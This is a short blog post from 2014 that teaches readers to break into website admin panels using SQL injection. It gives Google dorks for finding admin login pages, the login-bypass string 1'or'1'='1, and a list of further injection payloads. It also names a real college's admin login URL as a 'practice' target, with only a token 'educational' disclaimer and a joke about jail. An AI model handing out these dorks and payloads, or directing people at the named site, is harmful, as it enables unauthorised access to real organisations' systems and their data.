Saturday, August 30, 2014

on Leave a Comment

Hack website using SQL injection

Today i m going to teach you how to hack website using simple sql injection. this my 1st post about website hacking, previously i posted about defacing JCMS site,

SQL mean Structured Query Language .




First we should find websites admin panel using a simple google dork .
Dorks :
inurl:adminlogin.aspx
inurl:admin/index.php
inurl:administrator.php
inurl:adminlogin.aspx
Now go to google and paste 1 of avobe dorks to find site, [note:Try to make your own dorks to get more success rate.] Hundreds of sites will open up having /admin_login.aspx in their URL. Select any website , which you want to hack, you will get the area from where the admins login to that site to controll the site. Fill the login form as: Username
1'or'1'='1
Password :
1'or'1'='1
then press sign in or Login you will be into the admin panel of a website. It will not work for all the websites you will find , but will work on most of the website. Other InjecTion Queries :
‘ or ’1′=’1
‘ or ‘x’='x
‘ or 0=0 –
” or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’='x
” or “x”=”x
‘) or (‘x’='x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’='a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –

Site for practice:- http://satyamcolleges.com/Webadmin/AdminLogin.aspx Login ID= 1'or'1'='1 Password = 1'or'1'='1 Note: This is just for educational propouse, I m not responsible for its harmfull effect, try it at your own risk, you can get free food on jail by this :d

0 comments:

Post a Comment


loading...